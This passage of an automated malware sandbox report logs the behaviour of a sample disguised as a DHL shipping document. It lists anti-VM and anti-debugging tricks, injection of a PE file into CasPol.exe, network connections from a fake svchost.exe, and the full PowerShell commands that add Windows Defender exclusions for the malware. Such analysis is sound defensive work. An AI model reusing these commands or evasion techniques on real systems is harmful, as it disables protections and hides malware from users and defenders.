Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Source: C:\Windows\explorer.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 18_2_00E167C0 sgdt fword ptr [eax]

18_2_00E167C0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 18_2_00E15841 sidt fword ptr [ebp+esi*2-74AAFF1Dh]

18_2_00E15841

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 18_2_00E153E1 smsw word ptr [ecx+edi*4-1Dh]

18_2_00E153E1

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5354	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1684	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Window / User API: threadDelayed 4096
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Window / User API: threadDelayed 5281

Source: C:\Windows\System32\svchost.exe TID: 5816	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5140	Thread sleep time: -14757395258967632s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5140	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000	Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5000	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5684	Thread sleep time: -3689348814741908s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WerFault.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: powershell.exe, 0000000A.00000003.494697592.0000000005AA7000.00000004.00000001.sdmp, powershell.exe, 00000012.00000002.538749877.0000000004D4D000.00000004.00000001.sdmp	Binary or memory string: Hyper-V
Source: svchost.exe, 00000004.00000002.527331789.00000194BB84A000.00000004.00000001.sdmp	Binary or memory string: "@Hyper-V RAW
Source: svchost.exe, 00000005.00000002.528696486.000002257A140000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.348855121.000001BD7EF40000.00000002.00000001.sdmp, svchost.exe, 00000015.00000002.359462249.0000021502860000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: svchost.exe, 00000011.00000002.516851246.0000000001274000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B-90E5-ECF4BB570DC9}
Source: svchost.exe, 00000011.00000002.519202298.00000000012DF000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001A.00000002.511723717.0000000000928000.00000004.00000020.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\b8b}\
Source: explorer.exe, 00000010.00000002.508304531.0000000000A87000.00000004.00000020.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}`
Source: svchost.exe, 00000004.00000002.527821100.00000194BB860000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000005.00000002.528696486.000002257A140000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.348855121.000001BD7EF40000.00000002.00000001.sdmp, svchost.exe, 00000015.00000002.359462249.0000021502860000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 00000005.00000002.528696486.000002257A140000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.348855121.000001BD7EF40000.00000002.00000001.sdmp, svchost.exe, 00000015.00000002.359462249.0000021502860000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 0000001A.00000002.511723717.0000000000928000.00000004.00000020.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000005.00000002.509681654.0000022579468000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.508922911.0000027B9CC29000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.516851246.0000000001274000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 0000000A.00000003.494697592.0000000005AA7000.00000004.00000001.sdmp, powershell.exe, 00000012.00000002.538749877.0000000004D4D000.00000004.00000001.sdmp	Binary or memory string: {l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: svchost.exe, 00000005.00000002.528696486.000002257A140000.00000002.00000001.sdmp, svchost.exe, 0000000D.00000002.348855121.000001BD7EF40000.00000002.00000001.sdmp, svchost.exe, 00000015.00000002.359462249.0000021502860000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: explorer.exe, 00000010.00000002.508304531.0000000000A87000.00000004.00000020.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\b8b}\S

Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to hide a thread from the debugger

Show sources

Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe

Code function: 0_2_069D6998 NtSetInformationThread ?,00000011,?,?,?,?,?,?,?,069D706F,00000000,00000000

0_2_069D6998

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Thread information set: HideFromDebugger	Jump to behavior

Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe

Code function: 12_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

12_2_0040289F

Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Network Connect: 104.21.71.230 80
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Network Connect: 172.67.172.17 80

Adds a directory exclusion to Windows Defender

Show sources

Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' -Force
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DHL_document1102202068090891.exe' -Force
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' -Force	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DHL_document1102202068090891.exe' -Force	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 420000	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 422000	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 8BE008	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe

Code function: 12_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,

12_2_00401C26

Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' -Force	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process created: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DHL_document1102202068090891.exe' -Force	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe	Process created: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe' /SpecialRun 4101d8 1864	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5308 -ip 5308
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 2256

Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process created: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run			Jump to behavior

Source: DHL_document1102202068090891.exe, 00000000.00000002.521046071.0000000001CB0000.00000002.00000001.sdmp, explorer.exe, 00000010.00000002.514691785.0000000001170000.00000002.00000001.sdmp, svchost.exe, 00000011.00000002.522047970.0000000001B90000.00000002.00000001.sdmp, explorer.exe, 0000001A.00000002.516337319.0000000001050000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: DHL_document1102202068090891.exe, 00000000.00000002.521046071.0000000001CB0000.00000002.00000001.sdmp, explorer.exe, 00000010.00000002.514691785.0000000001170000.00000002.00000001.sdmp, svchost.exe, 00000011.00000002.522047970.0000000001B90000.00000002.00000001.sdmp, explorer.exe, 0000001A.00000002.516337319.0000000001050000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: DHL_document1102202068090891.exe, 00000000.00000002.521046071.0000000001CB0000.00000002.00000001.sdmp, explorer.exe, 00000010.00000002.514691785.0000000001170000.00000002.00000001.sdmp, svchost.exe, 00000011.00000002.522047970.0000000001B90000.00000002.00000001.sdmp, explorer.exe, 0000001A.00000002.516337319.0000000001050000.00000002.00000001.sdmp	Binary or memory string: SProgram Managerl
Source: DHL_document1102202068090891.exe, 00000000.00000002.521046071.0000000001CB0000.00000002.00000001.sdmp, explorer.exe, 00000010.00000002.514691785.0000000001170000.00000002.00000001.sdmp, svchost.exe, 00000011.00000002.522047970.0000000001B90000.00000002.00000001.sdmp, explorer.exe, 0000001A.00000002.516337319.0000000001050000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd,
Source: DHL_document1102202068090891.exe, 00000000.00000002.521046071.0000000001CB0000.00000002.00000001.sdmp, explorer.exe, 00000010.00000002.514691785.0000000001170000.00000002.00000001.sdmp, svchost.exe, 00000011.00000002.522047970.0000000001B90000.00000002.00000001.sdmp, explorer.exe, 0000001A.00000002.516337319.0000000001050000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Queries volume information: C:\Users\user\Desktop\DHL_document1102202068090891.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
